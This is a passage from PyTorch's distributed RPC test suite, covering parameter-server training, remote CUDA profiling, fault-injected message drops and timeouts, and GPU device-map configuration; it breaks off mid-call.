def _my_parameter_server(self, sparse):
ps_rref = RRef(MyParameterServer(self.world_size - 1))
futures = []
for index in range(1, self.world_size):
futures.append(
rpc.rpc_async(
worker_name((self.rank + index) % self.world_size),
self._trainer_func,
args=(
ps_rref,
sparse
),
)
)
torch.futures.wait_all(futures)
@dist_init
def test_my_parameter_server(self):
self._my_parameter_server(False)
@dist_init
def test_my_parameter_server_sparse(self):
self._my_parameter_server(True)
class CudaRpcTest(RpcAgentTestFixture):
@skip_if_lt_x_gpu(2)
@dist_init
def test_profiler_remote_cuda(self):
if self.rank != 1:
return
dst_cuda_0 = (self.rank + 1) % self.world_size
dst_cuda_1 = (self.rank + 2) % self.world_size
dst_worker_cuda_0 = worker_name(dst_cuda_0)
dst_worker_cuda_1 = worker_name(dst_cuda_1)
with _profile(use_cuda=True) as p:
fut1 = rpc.rpc_async(dst_worker_cuda_0, udf_with_torch_ops, args=(0, ))
fut2 = rpc.rpc_async(dst_worker_cuda_1, udf_with_torch_ops, args=(1, ))
fut1.wait()
fut2.wait()
def get_name(event):
return event.name[event.name.find(REMOTE_OP_STR) + len(REMOTE_OP_STR):]
function_events = p.function_events
for event in function_events:
if event.is_async:
self.assertEqual(0, event.cuda_time_total)
self.assertEqual([], event.kernels)
self.assertEqual(0, event.cuda_time)
else:
if event.node_id == 1:
continue
self.assertTrue(event.node_id in [dst_cuda_0, dst_cuda_1])
if get_name(event) in EXPECTED_REMOTE_EVENTS:
self.assertGreater(event.cuda_time_total, 0)
self.assertEqual(1, len(event.kernels))
kernel = event.kernels[0]
if event.node_id == dst_cuda_0:
self.assertEqual(kernel.device, 0)
if event.node_id == dst_cuda_1:
self.assertEqual(kernel.device, 1)
self.assertGreater(event.cuda_time, 0)
# Validate that EXPECTED_REMOTE_EVENTS is a subset of remotely profiled
# events.
remote_events = [event for event in function_events if event.is_remote]
remote_event_names = [get_name(event) for event in remote_events if get_name(event) in EXPECTED_REMOTE_EVENTS]
self.assertEqual(set(remote_event_names), set(EXPECTED_REMOTE_EVENTS))
class FaultyAgentRpcTest(RpcAgentTestFixture):
# no faulty_messages defined so this fails all retryable messages - see
# faulty_rpc_agent_test_fixture.py for the list of retryable messages.
@dist_init(messages_to_delay={})
def test_check_failed_messages(self):
if self.rank == 0:
dst_worker_b = worker_name((self.rank + 1) % self.world_size)
dst_worker_c = worker_name((self.rank + 2) % self.world_size)
# Worker0 sends RPC to Worker1 and creates an RRef there
rref = rpc.remote(dst_worker_b, torch.add, args=(torch.ones(2, 2), torch.ones(2, 2)))
# Worker0 sends an RPC to Worker2 with the RRef as an arg
rpc.remote(dst_worker_c, add_rref_to_value, args=(rref, torch.ones(2, 2)))
# check if the output is as expected
self.assertEqual(rref.to_here(), torch.add(torch.ones(2, 2), torch.ones(2, 2)))
# explicitly delete all User RRefs
_delete_all_user_and_unforked_owner_rrefs()
@dist_init
def test_verify_backend_options(self):
self.assertEqual(self.rpc_backend, rpc.backend_registry.BackendType.FAULTY_TENSORPIPE)
self.assertEqual(self.rpc_backend_options.num_worker_threads, 8)
self.assertEqual(self.rpc_backend_options.num_fail_sends, 3)
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 4)
self.assertEqual(len(self.rpc_backend_options.messages_to_delay), 2)
self.assertEqual(self.rpc_backend_options.rpc_timeout, rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"])
def test_custom_faulty_messages(self):
self.assertEqual(
set(["RREF_FORK_REQUEST", "RREF_CHILD_ACCEPT"]),
set(self.rpc_backend_options.messages_to_fail),
)
@dist_init(faulty_messages=[])
def test_no_faulty_messages(self):
self.assertEqual(len(self.rpc_backend_options.messages_to_fail), 0)
@dist_init(messages_to_delay={"SCRIPT_CALL": 1.5})
def test_custom_messages_to_delay(self):
self.assertEqual(self.rpc_backend_options.messages_to_delay, {"SCRIPT_CALL": 1.5})
def _test_remote_message_dropped_pickle(self, dst=None):
if self.rank != 0:
return
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, my_sleep_func, args=(1,))
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# Attempt to fork the RRef should raise an error indicating the rpc.remote timeout.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref._serialize()
# Test that using RRef as arg over RPC (which forks) results in the same
# error
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 1))
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle(self):
self._test_remote_message_dropped_pickle()
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_remote_message_dropped_pickle_to_self(self):
self._test_remote_message_dropped_pickle(self.rank)
def _test_remote_message_dropped_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# test the case where rpc.remote() message creation is completely dropped.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# Since we fail python_remote_call messages synchronously, the future
# corresponding to this remote call will be marked with an error when
# this function returns.
rref = rpc.remote(dst_worker, func, args=args)
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Note: during shutdown, logs will indicate "Could not find OwnerRRef..."
# on the owning nodes. This is expected because the OwnerRRef was never
# successfully created; therefore, delAllUsers will work as expected.
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["SCRIPT_REMOTE_CALL"])
def test_builtin_remote_message_dropped_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_dropped_timeout(func, args, dst=0)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args)
@dist_init(faulty_messages=["PYTHON_REMOTE_CALL"])
def test_udf_remote_message_dropped_timeout_to_self(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_dropped_timeout(func, args, dst=0)
def _test_remote_message_delay_timeout(self, func, args, dst=None):
if self.rank != 0:
return
# Test the case where remote message is eventually processed on the owner,
# but the future on the creator times out before the response comes back.
dst_rank = dst if dst is not None else (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
# 1 ms timeout
rref = rpc.remote(dst_worker, func, args=args, timeout=0.001)
# Future corresponding to the remote creation should time out.
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref._get_future().wait()
# Call to ensure pending callbacks are run.
wait_until_pending_futures_and_users_flushed()
# to_here() should now pick up that rpc.remote() creation has failed.
with self.assertRaisesRegex(RuntimeError, "RRef creation"):
rref.to_here()
# Test the case where rpc.remote() times out, but to_here() has already
# started blocking before.
# NOTE: we only test this when not sending to self, as to_here() calls
# localValue(), which does not send an RPC and thus does not have
# a timeout. This can be supported by allowing future.wait() to
# take in an optional timeout (https://github.com/pytorch/pytorch/issues/39280)
if dst_rank != self.rank:
slow_rref = rpc.remote(dst_worker, func, args=args, timeout=2)
with self.assertRaisesRegex(RuntimeError, expected_error):
# to_here() should raise timeout error, since it does not know about the
# status of rpc.remote().
slow_rref.to_here(0.001)
# Note: If we proceed with shutdown, UserRRef will send out an RRefUserDelete
# but this can be a noop since it may not exist on the owner yet. Later,
# the owner can process the RRef creation and wait for the delete message,
# thus leading to a timeout.
# Therefore, we wait until we get notification that pending owners have
# been confirmed before sending out RRefUserDeletes.
if dst_rank != self.rank:
wait_until_owners_and_forks_on_rank(2, 2, rank=dst_rank)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout(self):
func = my_sleep_func
args = (2,)
self._test_remote_message_delay_timeout(func, args)
@dist_init(faulty_messages=[], messages_to_delay={"PYTHON_REMOTE_CALL": 2})
def test_udf_remote_message_delay_timeout_to_self(self):
func = my_sleep_func
args = (1,)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_builtin_delay_timeout_to_self(self):
func = torch.add
args = (torch.tensor(1), torch.tensor(1))
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args)
@dist_init(
faulty_messages=[],
messages_to_delay={"SCRIPT_REMOTE_CALL": 2, "SCRIPT_RREF_FETCH_CALL": 1},
)
def test_remote_message_script_delay_timeout_to_self(self):
func = my_script_func
args = (torch.tensor(1),)
self._test_remote_message_delay_timeout(func, args, dst=0)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_RREF_FETCH_CALL": 1})
def test_rref_to_here_timeout(self):
if self.rank != 0:
return
dst_rank = (self.rank + 1) % self.world_size
dst_worker = "worker{}".format(dst_rank)
rref = rpc.remote(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rref.to_here(0.01)
rref.to_here()
@dist_init(faulty_messages=[])
def test_rpc_builtin_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
# PYTHON_CALL message types which correspond to Python UDF over RPC
# by default get a delay (see faulty_rpc_agent_test_fixture)
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(
dst_worker,
torch.add,
args=(torch.tensor(1), torch.tensor(1)),
timeout=1,
)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=1
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1))
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
fut = rpc.rpc_async(
dst_worker, torch.add, args=(torch.tensor(1), torch.tensor(1)), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init(faulty_messages=[], messages_to_delay={"SCRIPT_CALL": 1.5})
def test_rpc_script_timeout(self):
next_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(next_rank)
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
fut = rpc.rpc_async(dst_worker, my_script_func, args=(torch.tensor(1),), timeout=1)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure that the currently set default timeout is large enough such
# that RPCs with delays still complete.
self.assertEqual(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC, rpc.get_rpc_timeout())
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
fut.wait()
# Ensure timeout if we set a new default and don't override
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),)
)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if we specify timeout of 0
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(
dst_worker, my_script_func, args=(torch.tensor(1),), timeout=0
)
fut.wait()
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
class TensorPipeAgentRpcTest(RpcAgentTestFixture):
def test_mismatched_type_for_options(self):
# An exception should be raised if the options are not an instance of
# TensorPipeRpcBackendOptions.
rpc_backend_options = FooBackendOptions(self.init_method)
with self.assertRaisesRegex(
TypeError, "`rpc_backend_options` must be a `TensorPipeRpcBackendOptions`"
):
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
backend=rpc.BackendType.TENSORPIPE,
rpc_backend_options=rpc_backend_options,
)
def test_infer_backend_from_options(self):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.init_method
)
rpc.init_rpc(
name=worker_name(self.rank),
rank=self.rank,
world_size=self.world_size,
# Do _not_ pass backend.
rpc_backend_options=rpc_backend_options,
)
self.assertIsInstance(rpc.api._get_current_rpc_agent(), rpc.TensorPipeAgent)
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_set_and_get_num_worker_threads(self):
NUM_THREADS = 27
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=NUM_THREADS
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertEqual(int(info["agent.thread_pool_size"]), NUM_THREADS)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_set_default_timeout(self):
timeout = 0.5
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
default_timeout = rpc.get_rpc_timeout()
self.assertEqual(default_timeout, timeout)
rpc.shutdown()
# FIXME Merge this test with the corresponding one in RpcTest.
@dist_init(setup_rpc=False)
def test_tensorpipe_options_throw_on_timedelta_timeout(self):
from datetime import timedelta
timeout = timedelta()
# Ensure that constructing TensorPipeRpcBackendOptions with timedelta fails
with self.assertRaisesRegex(TypeError, "incompatible constructor arguments"):
rpc_backend_options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
rpc_timeout=timeout,
)
@dist_init
def _test_rref_get_type_timeout(self, blocking):
# Test where we try to get the type of a RRef from an owner, but RRef
# creation is slower than timeout passed into _get_type.
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.5
expected_err = self.get_timeout_error_regex()
# Blocking: blocks on inline call
if blocking:
with self.assertRaisesRegex(RuntimeError, expected_err):
slow_rref._get_type(timeout=timeout, blocking=blocking)
# Non-blocking: blocks on wait
else:
fut = slow_rref._get_type(timeout=timeout, blocking=blocking)
with self.assertRaisesRegex(RuntimeError, expected_err):
fut.wait()
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
def test_rref_get_type_timeout_blocking(self):
self._test_rref_get_type_timeout(blocking=True)
def test_rref_get_type_timeout_non_blocking(self):
self._test_rref_get_type_timeout(blocking=False)
@dist_init
def test_op_with_invalid_args(self):
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Overloaded torch operator invoked from Python failed to many any schema"
):
rpc.rpc_sync(dst, torch.add, args=())
def _test_rref_proxy_timeout(self, rref_proxy_api):
dst_rank = (self.rank + 1) % self.world_size
dst = worker_name(dst_rank)
rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), ))
# Ensure RRef is created on remote node.
rref.to_here()
rref_api = getattr(rref, rref_proxy_api)
self.assertTrue(rref_api is not None, f"Failed to get RRef proxy api: {rref_proxy_api}")
expected_error = self.get_timeout_error_regex()
timeout = 2
with self.assertRaisesRegex(RuntimeError, expected_error):
result = rref_api(timeout=timeout).my_slow_method(torch.ones(2, 2))
if rref_api == rref.rpc_async:
result.wait()
elif rref_api == rref.remote:
result._get_future().wait()
# Case where rpc.remote() is stuck and exceeds timeout
slow_rref = rpc.remote(dst, MyClass, args=(torch.ones(2, 2), True))
timeout = 0.01
rref_api = getattr(slow_rref, rref_proxy_api)
# Note that even when we call rref.rpc_async() in this case, we time out
# during future creation rather than while waiting on the future. This is
# because the rref proxy function calls rref._get_type before returning the
# future, which blocks on the RRef being created on the owner node, up to the
# specified timeout.
with self.assertRaisesRegex(RuntimeError, expected_error):
rref_api(timeout=timeout).my_instance_method(torch.ones(2, 2))
# FIXME We wait until the remote completed creating the OwnerRRef
# because there's currently a race if we shut down RPC before that.
slow_rref.to_here()
@dist_init
def test_rref_proxy_timeout(self):
for rpc_api in ["rpc_sync", "rpc_async", "remote"]:
self._test_rref_proxy_timeout(rpc_api)
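# Small CNN used by the CUDA RPC tests; forward() injects an artificial delay on the
# current CUDA stream before running the network.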
class MyConvNetForMNIST(nn.Module):
def __init__(self, device):
super().__init__()
self.net = nn.Sequential(
nn.Conv2d(1, 16, 3, 1),
nn.ReLU(),
nn.Conv2d(16, 32, 3, 1),
nn.ReLU(),
nn.MaxPool2d(2),
nn.Flatten(1),
nn.Linear(4608, 128),
nn.ReLU(),
nn.Linear(128, 10),
).to(device)
self.device = device
def forward(self, x, is_rref=False):
x = x.to_here() if is_rref else x
with torch.cuda.stream(torch.cuda.current_stream(self.device)):
# intentionally adding delay to current CUDA stream
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
return self.net(x)
def __getstate__(self):
# return an empty dict to avoid inspecting the model contents on the
# owner
return {}
class TensorPipeAgentCudaRpcTest(RpcAgentTestFixture):
def _test_device_maps(self, options, errMsg):
with self.assertRaisesRegex(ValueError, errMsg):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
self.assertFalse(rpc.api._is_current_rpc_agent_set())
@skip_if_lt_x_gpu(2)
def test_device_maps_wrong_worker_name(self):
options = self.rpc_backend_options
options.set_device_map("none_exist", {0: 1})
self._test_device_maps(
options,
errMsg="Node worker0 has invalid target node names in its device maps"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_local_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {torch.cuda.device_count(): 0})
self._test_device_maps(
options,
errMsg="Node worker0 has source devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_max_remote_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: torch.cuda.device_count()})
self._test_device_maps(
options,
errMsg="Node worker0 has target devices with invalid indices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_many_to_one(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
options.set_device_map(dst, {0: 0})
self._test_device_maps(
options,
errMsg="Node worker0 has duplicated target devices in its device map for worker1"
)
@skip_if_lt_x_gpu(2)
def test_device_maps_one_to_many(self):
if self.rank == 0:
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1})
with self.assertRaisesRegex(
ValueError, "`set_device_map` only supports 1-to-1 mapping"
):
options.set_device_map(dst, {0: 0})
@skip_if_lt_x_gpu(1)
def test_device_maps_invalid_min_device(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {-1: 0})
with self.assertRaisesRegex(
RuntimeError, "Device index must not be negative"
):
options.set_device_map(dst, {0: -1})
@staticmethod
def _gpu_add(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 1]):
return (x + y).to(0)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_gpu(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {0: 1, 1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add,
args=(torch.zeros(2).to(0), torch.ones(2).to(0))
)
self.assertEqual(ret.device, torch.device(1))
self.assertEqual(ret, (torch.zeros(2) + torch.ones(2)).to(1))
rpc.shutdown()
@staticmethod
def _gpu_add_given_devices(x, y, x_to, y_to, z_to):
x_device = "cpu" if x.device.type == "cpu" else x.device.index
y_device = "cpu" if y.device.type == "cpu" else y.device.index
if x_device == x_to and y_device == y_to:
return x.to(z_to) + y.to(z_to)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_gpu(self, x_from, y_from, z_to, device_map, dst=None, fn=None):
fn = TensorPipeAgentCudaRpcTest._gpu_add_given_devices if fn is None else fn
x_to = device_map[x_from]
y_to = device_map[y_from]
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size) if dst is None else dst
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(x_from)
y = torch.ones(2).to(y_from)
ret = rpc.rpc_sync(dst, fn, args=(x, y, x_to, y_to, z_to))
reverse_device_map = {device_map[k] : k for k in device_map}
z_from = reverse_device_map[z_to]
ret_device = "cpu" if ret.device.type == "cpu" else ret.device.index
self.assertEqual(ret_device, z_from)
self.assertEqual(ret, torch.ones(2).to(z_from))
rpc.shutdown()
def test_device_map_cpu(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to="cpu",
device_map={"cpu" : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_cpu_to_gpu_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=0,
device_map={"cpu" : 0},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_cpu_to_gpu_non_default(self):
self._test_device_maps_gpu(
x_from="cpu",
y_from="cpu",
z_to=1,
device_map={"cpu" : 1},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(1)
def test_device_map_gpu_to_cpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to="cpu",
device_map={0 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_to_cpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to="cpu",
device_map={1 : "cpu"},
fn=TensorPipeAgentCudaRpcTest._gpu_add_given_devices,
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=0,
device_map={0 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=1,
device_map={1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_default_to_non_default(self):
self._test_device_maps_gpu(
x_from=0,
y_from=0,
z_to=1,
device_map={0 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_non_default_to_default(self):
self._test_device_maps_gpu(
x_from=1,
y_from=1,
z_to=0,
device_map={1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0}
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_1(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_2(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_3(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_4(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 0, 1 : 1},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_5(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_6(self):
self._test_device_maps_gpu(
x_from=0,
y_from=1,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_7(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=0,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@skip_if_lt_x_gpu(2)
def test_device_map_gpu_mixed_self_8(self):
self._test_device_maps_gpu(
x_from=1,
y_from=0,
z_to=1,
device_map={0 : 1, 1 : 0},
dst=worker_name(self.rank)
)
@staticmethod
def _gpu_add_multi_gpu(x, y):
if all([x.is_cuda, x.device.index == 1, y.is_cuda, y.device.index == 0]):
return x.to(0) + y, x - y.to(1)
else:
raise ValueError("Wrong device affinity")
def _test_device_maps_multi_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(1)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(x, y)
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_multi_gpu(dst)
@skip_if_lt_x_gpu(2)
def test_device_maps_multi_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_multi_gpu(dst)
@staticmethod
def _gpu_add_return_to_gpu(x, y):
if x.device.type == 'cpu' and y.device.type == 'cpu':
return (x + y).to(0), (x - y).to(1), (x * y).to(2), (x / y).to(3)
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(2)
def test_device_maps_in_options(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc.TensorPipeRpcBackendOptions(
init_method=options.init_method,
num_worker_threads=options.num_worker_threads,
device_maps={dst: {0: 1, 1: 0}}
)
)
rets = rpc.rpc_sync(
dst,
